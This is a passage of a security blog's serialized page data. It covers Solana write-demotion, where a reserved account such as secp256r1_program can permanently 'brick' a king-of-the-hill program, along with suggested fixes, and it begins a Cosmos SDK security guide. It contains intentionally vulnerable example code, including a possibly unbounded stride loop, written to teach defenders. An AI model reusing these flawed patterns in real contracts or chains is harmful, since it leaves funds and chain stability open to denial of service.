ReservedAccountKeys",{"type":28,"tag":116,"props":74753,"children":74754},{"style":370},[74755],{"type":33,"value":3151},{"type":28,"tag":116,"props":74757,"children":74758},{"style":282},[74759],{"type":33,"value":15083},{"type":28,"tag":116,"props":74761,"children":74762},{"style":266},[74763],{"type":33,"value":313},{"type":28,"tag":116,"props":74765,"children":74766},{"style":370},[74767],{"type":33,"value":2780},{"type":28,"tag":116,"props":74769,"children":74770},{"style":376},[74771],{"type":33,"value":13379},{"type":28,"tag":116,"props":74773,"children":74774},{"style":370},[74775],{"type":33,"value":141},{"type":28,"tag":116,"props":74777,"children":74778},{"style":266},[74779],{"type":33,"value":74780},"reserved_account_keys);\n",{"type":28,"tag":116,"props":74782,"children":74783},{"class":245,"line":387},[74784,74789,74793,74798,74802,74806,74810,74814],{"type":28,"tag":116,"props":74785,"children":74786},{"style":272},[74787],{"type":33,"value":74788},"    reserved_keys",{"type":28,"tag":116,"props":74790,"children":74791},{"style":370},[74792],{"type":33,"value":141},{"type":28,"tag":116,"props":74794,"children":74795},{"style":282},[74796],{"type":33,"value":74797},"update_active_set",{"type":28,"tag":116,"props":74799,"children":74800},{"style":266},[74801],{"type":33,"value":313},{"type":28,"tag":116,"props":74803,"children":74804},{"style":370},[74805],{"type":33,"value":2780},{"type":28,"tag":116,"props":74807,"children":74808},{"style":376},[74809],{"type":33,"value":13379},{"type":28,"tag":116,"props":74811,"children":74812},{"style":370},[74813],{"type":33,"value":141},{"type":28,"tag":116,"props":74815,"children":74816},{"style":266},[74817],{"type":33,"value":74818},"feature_set);\n",{"type":28,"tag":116,"props":74820,"children":74821},{"class":245,"line":400},[74822,74827,74831,74835,74839,74844],{"type":28,"tag":116,"props":74823,"children":74824},{"style":339},[74825],{"type":33,"value":74826},"    Arc",{"type":28,"tag":116,"props":74828,"children":74829},{"style":370},[74830],{"type":33,"value":3151},{"type":28,"tag":116,"props":74832,"children":74833},{"style":282},[74834],{"type":33,"value":336},{"type":28,"tag":116,"props":74836,"children":74837},{"style":266},[74838],{"type":33,"value":313},{"type":28,"tag":116,"props":74840,"children":74841},{"style":272},[74842],{"type":33,"value":74843},"reserved_keys",{"type":28,"tag":116,"props":74845,"children":74846},{"style":266},[74847],{"type":33,"value":2830},{"type":28,"tag":116,"props":74849,"children":74850},{"class":245,"line":614},[74851],{"type":28,"tag":116,"props":74852,"children":74853},{"style":266},[74854],{"type":33,"value":16239},{"type":28,"tag":443,"props":74856,"children":74858},{"id":74857},"consequences-silent-failures-and-bricked-programs",[74859],{"type":33,"value":74860},"Consequences: Silent Failures and Bricked Programs",{"type":28,"tag":29,"props":74862,"children":74863},{},[74864],{"type":33,"value":74865},"This behavior is especially dangerous when you constrain a program to be writable, for example, with anchor, it's pretty common to use the account(mut) constraint:",{"type":28,"tag":234,"props":74867,"children":74869},{"className":2652,"code":74868,"language":2651,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n    #[account(mut)]\n    pub throne: Account\u003C'info, Throne>,\n\n    #[account(mut, constraint = old_king.key() == throne.king)]\n    pub old_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub new_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub payer: Signer\u003C'info>,\n}\n",[74870],{"type":28,"tag":98,"props":74871,"children":74872},{"__ignoreMap":7},[74873,74888,74915,74930,74969,74976,75023,75054,75061,75076,75107,75114,75129,75160],{"type":28,"tag":116,"props":74874,"children":74875},{"class":245,"line":246},[74876,74880,74884],{"type":28,"tag":116,"props":74877,"children":74878},{"style":266},[74879],{"type":33,"value":22500},{"type":28,"tag":116,"props":74881,"children":74882},{"style":339},[74883],{"type":33,"value":22505},{"type":28,"tag":116,"props":74885,"children":74886},{"style":266},[74887],{"type":33,"value":19922},{"type":28,"tag":116,"props":74889,"children":74890},{"class":245,"line":256},[74891,74895,74899,74903,74907,74911],{"type":28,"tag":116,"props":74892,"children":74893},{"style":376},[74894],{"type":33,"value":13356},{"type":28,"tag":116,"props":74896,"children":74897},{"style":376},[74898],{"type":33,"value":20814},{"type":28,"tag":116,"props":74900,"children":74901},{"style":339},[74902],{"type":33,"value":70928},{"type":28,"tag":116,"props":74904,"children":74905},{"style":266},[74906],{"type":33,"value":22585},{"type":28,"tag":116,"props":74908,"children":74909},{"style":339},[74910],{"type":33,"value":22590},{"type":28,"tag":116,"props":74912,"children":74913},{"style":266},[74914],{"type":33,"value":6952},{"type":28,"tag":116,"props":74916,"children":74917},{"class":245,"line":293},[74918,74922,74926],{"type":28,"tag":116,"props":74919,"children":74920},{"style":266},[74921],{"type":33,"value":22792},{"type":28,"tag":116,"props":74923,"children":74924},{"style":376},[74925],{"type":33,"value":3394},{"type":28,"tag":116,"props":74927,"children":74928},{"style":266},[74929],{"type":33,"value":19922},{"type":28,"tag":116,"props":74931,"children":74932},{"class":245,"line":361},[74933,74937,74941,74945,74949,74953,74957,74961,74965],{"type":28,"tag":116,"props":74934,"children":74935},{"style":376},[74936],{"type":33,"value":20506},{"type":28,"tag":116,"props":74938,"children":74939},{"style":272},[74940],{"type":33,"value":70967},{"type":28,"tag":116,"props":74942,"children":74943},{"style":370},[74944],{"type":33,"value":4160},{"type":28,"tag":116,"props":74946,"children":74947},{"style":339},[74948],{"type":33,"value":22757},{"type":28,"tag":116,"props":74950,"children":74951},{"style":266},[74952],{"type":33,"value":22585},{"type":28,"tag":116,"props":74954,"children":74955},{"style":339},[74956],{"type":33,"value":22590},{"type":28,"tag":116,"props":74958,"children":74959},{"style":266},[74960],{"type":33,"value":825},{"type":28,"tag":116,"props":74962,"children":74963},{"style":339},[74964],{"type":33,"value":70992},{"type":28,"tag":116,"props":74966,"children":74967},{"style":266},[74968],{"type":33,"value":5809},{"type":28,"tag":116,"props":74970,"children":74971},{"class":245,"line":387},[74972],{"type":28,"tag":116,"props":74973,"children":74974},{"emptyLinePlaceholder":19},[74975],{"type":33,"value":1044},{"type":28,"tag":116,"props":74977,"children":74978},{"class":245,"line":400},[74979,74983,74987,74991,74995,74999,75003,75007,75011,75015,75019],{"type":28,"tag":116,"props":74980,"children":74981},{"style":266},[74982],{"type":33,"value":22792},{"type":28,"tag":116,"props":74984,"children":74985},{"style":376},[74986],{"type":33,"value":3394},{"type":28,"tag":116,"props":74988,"children":74989},{"style":266},[74990],{"type":33,"value":71027},{"type":28,"tag":116,"props":74992,"children":74993},{"style":370},[74994],{"type":33,"value":373},{"type":28,"tag":116,"props":74996,"children":74997},{"style":266},[74998],{"type":33,"value":71036},{"type":28,"tag":116,"props":75000,"children":75001},{"style":370},[75002],{"type":33,"value":141},{"type":28,"tag":116,"props":75004,"children":75005},{"style":266},[75006],{"type":33,"value":71045},{"type":28,"tag":116,"props":75008,"children":75009},{"style":370},[75010],{"type":33,"value":2340},{"type":28,"tag":116,"props":75012,"children":75013},{"style":266},[75014],{"type":33,"value":70967},{"type":28,"tag":116,"props":75016,"children":75017},{"style":370},[75018],{"type":33,"value":141},{"type":28,"tag":116,"props":75020,"children":75021},{"style":266},[75022],{"type":33,"value":71062},{"type":28,"tag":116,"props":75024,"children":75025},{"class":245,"line":614},[75026,75030,75034,75038,75042,75046,75050],{"type":28,"tag":116,"props":75027,"children":75028},{"style":376},[75029],{"type":33,"value":20506},{"type":28,"tag":116,"props":75031,"children":75032},{"style":272},[75033],{"type":33,"value":71036},{"type":28,"tag":116,"props":75035,"children":75036},{"style":370},[75037],{"type":33,"value":4160},{"type":28,"tag":116,"props":75039,"children":75040},{"style":339},[75041],{"type":33,"value":25053},{"type":28,"tag":116,"props":75043,"children":75044},{"style":266},[75045],{"type":33,"value":22585},{"type":28,"tag":116,"props":75047,"children":75048},{"style":339},[75049],{"type":33,"value":22590},{"type":28,"tag":116,"props":75051,"children":75052},{"style":266},[75053],{"type":33,"value":5809},{"type":28,"tag":116,"props":75055,"children":75056},{"class":245,"line":631},[75057],{"type":28,"tag":116,"props":75058,"children":75059},{"emptyLinePlaceholder":19},[75060],{"type":33,"value":1044},{"type":28,"tag":116,"props":75062,"children":75063},{"class":245,"line":665},[75064,75068,75072],{"type":28,"tag":116,"props":75065,"children":75066},{"style":266},[75067],{"type":33,"value":22792},{"type":28,"tag":116,"props":75069,"children":75070},{"style":376},[75071],{"type":33,"value":3394},{"type":28,"tag":116,"props":75073,"children":75074},{"style":266},[75075],{"type":33,"value":19922},{"type":28,"tag":116,"props":75077,"children":75078},{"class":245,"line":713},[75079,75083,75087,75091,75095,75099,75103],{"type":28,"tag":116,"props":75080,"children":75081},{"style":376},[75082],{"type":33,"value":20506},{"type":28,"tag":116,"props":75084,"children":75085},{"style":272},[75086],{"type":33,"value":71135},{"type":28,"tag":116,"props":75088,"children":75089},{"style":370},[75090],{"type":33,"value":4160},{"type":28,"tag":116,"props":75092,"children":75093},{"style":339},[75094],{"type":33,"value":25053},{"type":28,"tag":116,"props":75096,"children":75097},{"style":266},[75098],{"type":33,"value":22585},{"type":28,"tag":116,"props":75100,"children":75101},{"style":339},[75102],{"type":33,"value":22590},{"type":28,"tag":116,"props":75104,"children":75105},{"style":266},[75106],{"type":33,"value":5809},{"type":28,"tag":116,"props":75108,"children":75109},{"class":245,"line":750},[75110],{"type":28,"tag":116,"props":75111,"children":75112},{"emptyLinePlaceholder":19},[75113],{"type":33,"value":1044},{"type":28,"tag":116,"props":75115,"children":75116},{"class":245,"line":779},[75117,75121,75125],{"type":28,"tag":116,"props":75118,"children":75119},{"style":266},[75120],{"type":33,"value":22792},{"type":28,"tag":116,"props":75122,"children":75123},{"style":376},[75124],{"type":33,"value":3394},{"type":28,"tag":116,"props":75126,"children":75127},{"style":266},[75128],{"type":33,"value":19922},{"type":28,"tag":116,"props":75130,"children":75131},{"class":245,"line":796},[75132,75136,75140,75144,75148,75152,75156],{"type":28,"tag":116,"props":75133,"children":75134},{"style":376},[75135],{"type":33,"value":20506},{"type":28,"tag":116,"props":75137,"children":75138},{"style":272},[75139],{"type":33,"value":41862},{"type":28,"tag":116,"props":75141,"children":75142},{"style":370},[75143],{"type":33,"value":4160},{"type":28,"tag":116,"props":75145,"children":75146},{"style":339},[75147],{"type":33,"value":22821},{"type":28,"tag":116,"props":75149,"children":75150},{"style":266},[75151],{"type":33,"value":22585},{"type":28,"tag":116,"props":75153,"children":75154},{"style":339},[75155],{"type":33,"value":22590},{"type":28,"tag":116,"props":75157,"children":75158},{"style":266},[75159],{"type":33,"value":5809},{"type":28,"tag":116,"props":75161,"children":75162},{"class":245,"line":847},[75163],{"type":28,"tag":116,"props":75164,"children":75165},{"style":266},[75166],{"type":33,"value":406},{"type":28,"tag":29,"props":75168,"children":75169},{},[75170,75172,75178,75180,75186],{"type":33,"value":75171},"This works fine — until one day, ",{"type":28,"tag":98,"props":75173,"children":75175},{"className":75174},[],[75176],{"type":33,"value":75177},"old_king",{"type":33,"value":75179}," is silently demoted. Suddenly, the ",{"type":28,"tag":98,"props":75181,"children":75183},{"className":75182},[],[75184],{"type":33,"value":75185},"#[account(mut)]",{"type":33,"value":75187}," constraint fails, and your program is bricked. Even though you're passing a writable account in the transaction, the runtime has made a unilateral decision to override that.",{"type":28,"tag":443,"props":75189,"children":75191},{"id":75190},"real-world-example-write-demotion-with-secp256r1_program",[75192,75194],{"type":33,"value":75193},"Real-World Example: Write-Demotion with ",{"type":28,"tag":98,"props":75195,"children":75197},{"className":75196},[],[75198],{"type":33,"value":75199},"secp256r1_program",{"type":28,"tag":29,"props":75201,"children":75202},{},[75203,75205,75210],{"type":33,"value":75204},"Here’s a concrete example of the write-demotion trap playing out on mainnet — involving ",{"type":28,"tag":98,"props":75206,"children":75208},{"className":75207},[],[75209],{"type":33,"value":75199},{"type":33,"value":75211},", a precompiled program gated behind a feature flag:",{"type":28,"tag":234,"props":75213,"children":75215},{"className":2652,"code":75214,"language":2651,"meta":7,"style":7},"ReservedAccount::new_pending(\n    secp256r1_program::id(),\n    feature_set::enable_secp256r1_precompile::id(),\n)\n",[75216],{"type":28,"tag":98,"props":75217,"children":75218},{"__ignoreMap":7},[75219,75240,75260,75289],{"type":28,"tag":116,"props":75220,"children":75221},{"class":245,"line":246},[75222,75227,75231,75236],{"type":28,"tag":116,"props":75223,"children":75224},{"style":339},[75225],{"type":33,"value":75226},"ReservedAccount",{"type":28,"tag":116,"props":75228,"children":75229},{"style":370},[75230],{"type":33,"value":3151},{"type":28,"tag":116,"props":75232,"children":75233},{"style":282},[75234],{"type":33,"value":75235},"new_pending",{"type":28,"tag":116,"props":75237,"children":75238},{"style":266},[75239],{"type":33,"value":3133},{"type":28,"tag":116,"props":75241,"children":75242},{"class":245,"line":256},[75243,75248,75252,75256],{"type":28,"tag":116,"props":75244,"children":75245},{"style":266},[75246],{"type":33,"value":75247},"    secp256r1_program",{"type":28,"tag":116,"props":75249,"children":75250},{"style":370},[75251],{"type":33,"value":3151},{"type":28,"tag":116,"props":75253,"children":75254},{"style":282},[75255],{"type":33,"value":3156},{"type":28,"tag":116,"props":75257,"children":75258},{"style":266},[75259],{"type":33,"value":3161},{"type":28,"tag":116,"props":75261,"children":75262},{"class":245,"line":293},[75263,75268,75272,75277,75281,75285],{"type":28,"tag":116,"props":75264,"children":75265},{"style":266},[75266],{"type":33,"value":75267},"    feature_set",{"type":28,"tag":116,"props":75269,"children":75270},{"style":370},[75271],{"type":33,"value":3151},{"type":28,"tag":116,"props":75273,"children":75274},{"style":266},[75275],{"type":33,"value":75276},"enable_secp256r1_precompile",{"type":28,"tag":116,"props":75278,"children":75279},{"style":370},[75280],{"type":33,"value":3151},{"type":28,"tag":116,"props":75282,"children":75283},{"style":282},[75284],{"type":33,"value":3156},{"type":28,"tag":116,"props":75286,"children":75287},{"style":266},[75288],{"type":33,"value":3161},{"type":28,"tag":116,"props":75290,"children":75291},{"class":245,"line":361},[75292],{"type":28,"tag":116,"props":75293,"children":75294},{"style":266},[75295],{"type":33,"value":2830},{"type":28,"tag":29,"props":75297,"children":75298},{},[75299,75301,75306,75308,75314],{"type":33,"value":75300},"Before the ",{"type":28,"tag":98,"props":75302,"children":75304},{"className":75303},[],[75305],{"type":33,"value":75276},{"type":33,"value":75307}," feature is activated, this account behaves like any ordinary one. You can assign ",{"type":28,"tag":98,"props":75309,"children":75311},{"className":75310},[],[75312],{"type":33,"value":75313},"secp256r1_program::id()",{"type":33,"value":75315}," as the king in a contract.",{"type":28,"tag":29,"props":75317,"children":75318},{},[75319,75321,75326],{"type":33,"value":75320},"But once the feature is flipped on, the runtime silently marks it as read-only, blocking any future writes. As a result, ",{"type":28,"tag":98,"props":75322,"children":75324},{"className":75323},[],[75325],{"type":33,"value":75313},{"type":33,"value":75327}," becomes the eternal king, and no one can dethrone it.",{"type":28,"tag":443,"props":75329,"children":75331},{"id":75330},"fix-3-preventing-write-demotion-pitfalls",[75332],{"type":33,"value":75333},"Fix 3: Preventing Write-Demotion Pitfalls",{"type":28,"tag":29,"props":75335,"children":75336},{},[75337,75339,75344],{"type":33,"value":75338},"Alright, let’s try to fix this ",{"type":28,"tag":2583,"props":75340,"children":75341},{},[75342],{"type":33,"value":75343},"yet another",{"type":33,"value":75345}," edge case — and hopefully close the book on it.",{"type":28,"tag":443,"props":75347,"children":75349},{"id":75348},"attempt-1-block-known-reserved-accounts",[75350],{"type":33,"value":75351},"Attempt 1: Block Known Reserved Accounts",{"type":28,"tag":29,"props":75353,"children":75354},{},[75355],{"type":33,"value":75356},"One naive solution is to reject any known reserved account, for example:",{"type":28,"tag":234,"props":75358,"children":75360},{"className":39980,"code":75359,"language":39982,"meta":7,"style":7},"    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n+       assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",[75361],{"type":28,"tag":98,"props":75362,"children":75363},{"__ignoreMap":7},[75364,75372],{"type":28,"tag":116,"props":75365,"children":75366},{"class":245,"line":246},[75367],{"type":28,"tag":116,"props":75368,"children":75369},{"style":266},[75370],{"type":33,"value":75371},"    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n",{"type":28,"tag":116,"props":75373,"children":75374},{"class":245,"line":256},[75375],{"type":28,"tag":116,"props":75376,"children":75377},{"style":350},[75378],{"type":33,"value":75379},"+       assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",{"type":28,"tag":29,"props":75381,"children":75382},{},[75383,75385,75390],{"type":33,"value":75384},"This works in the short term, but doesn’t scale — you can’t predict all future additions to the ",{"type":28,"tag":98,"props":75386,"children":75388},{"className":75387},[],[75389],{"type":33,"value":75226},{"type":33,"value":75391}," list. The moment a new reserved account is introduced, your program becomes vulnerable again.",{"type":28,"tag":443,"props":75393,"children":75395},{"id":75394},"attempt-2-use-a-pda-vault",[75396],{"type":33,"value":75397},"Attempt 2: Use a PDA Vault",{"type":28,"tag":29,"props":75399,"children":75400},{},[75401,75403,75408],{"type":33,"value":75402},"A more future-proof fix is to avoid ",{"type":28,"tag":4995,"props":75404,"children":75405},{},[75406],{"type":33,"value":75407},"transferring lamports to arbitrary accounts",{"type":33,"value":75409}," altogether.",{"type":28,"tag":29,"props":75411,"children":75412},{},[75413],{"type":33,"value":75414},"A clean approach would be to store the refund lamports in a PDA vault owned by your program. This prevents your logic from depending on accounts you don’t have complete control over, and sidesteps any risk of write-demotion or future account restrictions.",{"type":28,"tag":63,"props":75416,"children":75418},{"id":75417},"final-thoughts",[75419],{"type":33,"value":75420},"Final Thoughts",{"type":28,"tag":29,"props":75422,"children":75423},{},[75424],{"type":33,"value":75425},"Transferring lamports on Solana is not always straightforward and carries potential risks. Account constraints alone are insufficient to ensure safety, especially when dealing with runtime-specific edge cases.",{"type":28,"tag":29,"props":75427,"children":75428},{},[75429],{"type":33,"value":75430},"We can safely transfer lamports to an account under the following conditions:",{"type":28,"tag":2108,"props":75432,"children":75433},{},[75434,75439,75444],{"type":28,"tag":459,"props":75435,"children":75436},{},[75437],{"type":33,"value":75438},"It's not executable.",{"type":28,"tag":459,"props":75440,"children":75441},{},[75442],{"type":33,"value":75443},"Its balance, after the transfer, remains rent-exempt.",{"type":28,"tag":459,"props":75445,"children":75446},{},[75447],{"type":33,"value":75448},"It's not a reserved account.",{"type":28,"tag":29,"props":75450,"children":75451},{},[75452],{"type":33,"value":75453},"This issue is not purely theoretical; it has impacted real-world programs. One significant case was recently reported to Jito via the bug bounty, which could have resulted in incorrect tip payments.",{"type":28,"tag":2516,"props":75455,"children":75456},{},[75457],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":75459},[75460,75461,75462,75468],{"id":28670,"depth":256,"text":28673},{"id":70842,"depth":256,"text":70845},{"id":71949,"depth":256,"text":71952,"children":75463},[75464,75465,75467],{"id":71955,"depth":293,"text":71958},{"id":72642,"depth":293,"text":75466},"Bug 2: Writable but Untouchable — set_lamports Fails",{"id":73947,"depth":293,"text":73950},{"id":75417,"depth":256,"text":75420},"content:blog:2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol",{"_path":75473,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":75474,"description":75475,"date":75476,"author":75477,"image":75478,"isFeatured":19,"onBlogPage":19,"tags":75480,"body":75483,"_type":2534,"_id":89366,"_source":2536,"_file":89367,"_stem":89368,"_extension":2539},"/blog/2025-06-10-cosmos-security","Cosmos Security: An Otter's Guide","From infinite loops and map determinism to AnteHandler missteps and storage key collisions, we highlight real-world vulnerabilities and actionable advice for building safer Cosmos-based projects.","2025-06-10","james",{"src":75479,"width":18,"height":18},"/posts/cosmos-security/title.png",[75481,75482],"cosmos-sdk","security",{"type":25,"children":75484,"toc":89344},[75485,75489,75494,75499,75505,75510,75515,75520,75781,76270,76289,76294,76299,76304,76310,76315,76350,76360,76867,76887,76900,76906,76911,76916,77157,77162,77170,77182,77544,77549,77554,77590,77599,78025,78046,78052,78072,78093,78112,78144,78156,78168,78821,78849,78858,79298,79325,79345,79350,79371,79420,79429,80661,80689,80695,80700,80705,80725,81012,81046,81227,81232,81237,81281,81290,82481,82732,82745,82751,82785,82790,82853,82858,82878,82897,82909,82928,83620,83625,83630,83658,83667,84552,84579,84585,84605,84610,84623,84797,84810,84901,84906,84914,84924,85074,85079,85099,85107,85112,85510,85522,85527,85568,85579,85599,85907,85912,86837,86849,86857,86862,87855,87860,87872,87892,87911,88825,88882,88988,89000,89005,89010,89038,89047,89273,89299,89312,89326,89330,89335,89340],{"type":28,"tag":63,"props":75486,"children":75487},{"id":28670},[75488],{"type":33,"value":28673},{"type":28,"tag":29,"props":75490,"children":75491},{},[75492],{"type":33,"value":75493},"The Cosmos SDK is an \"L1 toolkit\" for developers. It provides an open-source tool that enhances the ability to build application-specific L1 chains, all while prioritizing flexibility and control over the entire runtime environment. Unfortunately, with the convenience of the Cosmos SDK, security can be an oversight.",{"type":28,"tag":29,"props":75495,"children":75496},{},[75497],{"type":33,"value":75498},"In this comprehensive blog post, we break down security issues that are often overseen by developers, supported by real-world examples from live projects. Our goal is to provide a practical exploration of security vulnerabilities while also offering insights on how developers can identify and address these issues on their own.",{"type":28,"tag":63,"props":75500,"children":75502},{"id":75501},"its-loopin-time",[75503],{"type":33,"value":75504},"It's Loopin' Time",{"type":28,"tag":29,"props":75506,"children":75507},{},[75508],{"type":33,"value":75509},"There are notable differences in building app-specific L1s using the SDK and building contracts on established L1 chains. It is especially crucial to recognize that maintaining the stability of a blockchain is dependent on the developer.",{"type":28,"tag":29,"props":75511,"children":75512},{},[75513],{"type":33,"value":75514},"Below, we begin to demonstrate the differences between writing smart contracts with Solidity vs developing L1 with the Cosmos SDK.",{"type":28,"tag":29,"props":75516,"children":75517},{},[75518],{"type":33,"value":75519},"Here is a simple example for reference:",{"type":28,"tag":234,"props":75521,"children":75523},{"code":75522,"language":4142,"meta":7,"className":4143,"style":7},"function sumWithStride(\n    uint64 start,\n    uint64 stride,\n    uint64[] memory arr\n) public returns (uint64) {\n    uint64 idx = start;\n    uint64 sum = 0;\n    uint64 end = arr.length;\n\n    while (idx \u003C end) {\n        sum += arr[idx];\n        idx += stride;\n    }\n    return sum;\n}\n",[75524],{"type":28,"tag":98,"props":75525,"children":75526},{"__ignoreMap":7},[75527,75543,75560,75576,75598,75627,75648,75672,75693,75700,75721,75738,75755,75762,75774],{"type":28,"tag":116,"props":75528,"children":75529},{"class":245,"line":246},[75530,75534,75539],{"type":28,"tag":116,"props":75531,"children":75532},{"style":376},[75533],{"type":33,"value":830},{"type":28,"tag":116,"props":75535,"children":75536},{"style":282},[75537],{"type":33,"value":75538}," sumWithStride",{"type":28,"tag":116,"props":75540,"children":75541},{"style":266},[75542],{"type":33,"value":3133},{"type":28,"tag":116,"props":75544,"children":75545},{"class":245,"line":256},[75546,75551,75556],{"type":28,"tag":116,"props":75547,"children":75548},{"style":339},[75549],{"type":33,"value":75550},"    uint64",{"type":28,"tag":116,"props":75552,"children":75553},{"style":272},[75554],{"type":33,"value":75555}," start",{"type":28,"tag":116,"props":75557,"children":75558},{"style":266},[75559],{"type":33,"value":3178},{"type":28,"tag":116,"props":75561,"children":75562},{"class":245,"line":293},[75563,75567,75572],{"type":28,"tag":116,"props":75564,"children":75565},{"style":339},[75566],{"type":33,"value":75550},{"type":28,"tag":116,"props":75568,"children":75569},{"style":272},[75570],{"type":33,"value":75571}," stride",{"type":28,"tag":116,"props":75573,"children":75574},{"style":266},[75575],{"type":33,"value":3178},{"type":28,"tag":116,"props":75577,"children":75578},{"class":245,"line":361},[75579,75583,75588,75593],{"type":28,"tag":116,"props":75580,"children":75581},{"style":339},[75582],{"type":33,"value":75550},{"type":28,"tag":116,"props":75584,"children":75585},{"style":266},[75586],{"type":33,"value":75587},"[] ",{"type":28,"tag":116,"props":75589,"children":75590},{"style":376},[75591],{"type":33,"value":75592},"memory",{"type":28,"tag":116,"props":75594,"children":75595},{"style":272},[75596],{"type":33,"value":75597}," arr\n",{"type":28,"tag":116,"props":75599,"children":75600},{"class":245,"line":387},[75601,75605,75609,75614,75618,75623],{"type":28,"tag":116,"props":75602,"children":75603},{"style":266},[75604],{"type":33,"value":1609},{"type":28,"tag":116,"props":75606,"children":75607},{"style":376},[75608],{"type":33,"value":61294},{"type":28,"tag":116,"props":75610,"children":75611},{"style":260},[75612],{"type":33,"value":75613}," returns",{"type":28,"tag":116,"props":75615,"children":75616},{"style":266},[75617],{"type":33,"value":269},{"type":28,"tag":116,"props":75619,"children":75620},{"style":339},[75621],{"type":33,"value":75622},"uint64",{"type":28,"tag":116,"props":75624,"children":75625},{"style":266},[75626],{"type":33,"value":844},{"type":28,"tag":116,"props":75628,"children":75629},{"class":245,"line":400},[75630,75634,75639,75643],{"type":28,"tag":116,"props":75631,"children":75632},{"style":339},[75633],{"type":33,"value":75550},{"type":28,"tag":116,"props":75635,"children":75636},{"style":266},[75637],{"type":33,"value":75638}," idx ",{"type":28,"tag":116,"props":75640,"children":75641},{"style":370},[75642],{"type":33,"value":373},{"type":28,"tag":116,"props":75644,"children":75645},{"style":266},[75646],{"type":33,"value":75647}," start;\n",{"type":28,"tag":116,"props":75649,"children":75650},{"class":245,"line":614},[75651,75655,75660,75664,75668],{"type":28,"tag":116,"props":75652,"children":75653},{"style":339},[75654],{"type":33,"value":75550},{"type":28,"tag":116,"props":75656,"children":75657},{"style":266},[75658],{"type":33,"value":75659}," sum ",{"type":28,"tag":116,"props":75661,"children":75662},{"style":370},[75663],{"type":33,"value":373},{"type":28,"tag":116,"props":75665,"children":75666},{"style":350},[75667],{"type":33,"value":2718},{"type":28,"tag":116,"props":75669,"children":75670},{"style":266},[75671],{"type":33,"value":384},{"type":28,"tag":116,"props":75673,"children":75674},{"class":245,"line":631},[75675,75679,75684,75688],{"type":28,"tag":116,"props":75676,"children":75677},{"style":339},[75678],{"type":33,"value":75550},{"type":28,"tag":116,"props":75680,"children":75681},{"style":266},[75682],{"type":33,"value":75683}," end ",{"type":28,"tag":116,"props":75685,"children":75686},{"style":370},[75687],{"type":33,"value":373},{"type":28,"tag":116,"props":75689,"children":75690},{"style":266},[75691],{"type":33,"value":75692}," arr.length;\n",{"type":28,"tag":116,"props":75694,"children":75695},{"class":245,"line":665},[75696],{"type":28,"tag":116,"props":75697,"children":75698},{"emptyLinePlaceholder":19},[75699],{"type":33,"value":1044},{"type":28,"tag":116,"props":75701,"children":75702},{"class":245,"line":713},[75703,75707,75712,75716],{"type":28,"tag":116,"props":75704,"children":75705},{"style":260},[75706],{"type":33,"value":63993},{"type":28,"tag":116,"props":75708,"children":75709},{"style":266},[75710],{"type":33,"value":75711}," (idx ",{"type":28,"tag":116,"props":75713,"children":75714},{"style":370},[75715],{"type":33,"value":514},{"type":28,"tag":116,"props":75717,"children":75718},{"style":266},[75719],{"type":33,"value":75720}," end) {\n",{"type":28,"tag":116,"props":75722,"children":75723},{"class":245,"line":750},[75724,75729,75733],{"type":28,"tag":116,"props":75725,"children":75726},{"style":266},[75727],{"type":33,"value":75728},"        sum ",{"type":28,"tag":116,"props":75730,"children":75731},{"style":370},[75732],{"type":33,"value":68058},{"type":28,"tag":116,"props":75734,"children":75735},{"style":266},[75736],{"type":33,"value":75737}," arr[idx];\n",{"type":28,"tag":116,"props":75739,"children":75740},{"class":245,"line":779},[75741,75746,75750],{"type":28,"tag":116,"props":75742,"children":75743},{"style":266},[75744],{"type":33,"value":75745},"        idx ",{"type":28,"tag":116,"props":75747,"children":75748},{"style":370},[75749],{"type":33,"value":68058},{"type":28,"tag":116,"props":75751,"children":75752},{"style":266},[75753],{"type":33,"value":75754}," stride;\n",{"type":28,"tag":116,"props":75756,"children":75757},{"class":245,"line":796},[75758],{"type":28,"tag":116,"props":75759,"children":75760},{"style":266},[75761],{"type":33,"value":3025},{"type":28,"tag":116,"props":75763,"children":75764},{"class":245,"line":847},[75765,75769],{"type":28,"tag":116,"props":75766,"children":75767},{"style":260},[75768],{"type":33,"value":393},{"type":28,"tag":116,"props":75770,"children":75771},{"style":266},[75772],{"type":33,"value":75773}," sum;\n",{"type":28,"tag":116,"props":75775,"children":75776},{"class":245,"line":898},[75777],{"type":28,"tag":116,"props":75778,"children":75779},{"style":266},[75780],{"type":33,"value":406},{"type":28,"tag":234,"props":75782,"children":75786},{"code":75783,"language":75784,"meta":7,"className":75785,"style":7},"type MsgSumWithStrideParams struct {\n    Start uint64\n    Stride uint64\n    Arr []uint64\n}\n\ntype MsgSumWithStrideResponse struct {\n    Sum uint64\n}\n\nfunc (ms msgServer) SumWithStride(\n    goCtx context.Context,\n    msg *MsgSumWithStrideParams,\n) (*MsgSumWithStrideResponse, error) {\n    sum := uint64(0)\n    end := uint64(len(msg.Arr))\n    for idx := msg.Start; idx \u003C end; idx += msg.Stride {\n        sum += msg.Arr[idx]\n    }\n    return &MsgSumWithStrideResponse{Sum: sum}, nil\n}\n","go","language-go shiki shiki-themes slack-dark",[75787],{"type":28,"tag":98,"props":75788,"children":75789},{"__ignoreMap":7},[75790,75810,75823,75835,75853,75860,75867,75887,75899,75906,75913,75948,75974,75995,76024,76054,76099,76176,76212,76219,76263],{"type":28,"tag":116,"props":75791,"children":75792},{"class":245,"line":246},[75793,75797,75802,75806],{"type":28,"tag":116,"props":75794,"children":75795},{"style":376},[75796],{"type":33,"value":32394},{"type":28,"tag":116,"props":75798,"children":75799},{"style":339},[75800],{"type":33,"value":75801}," 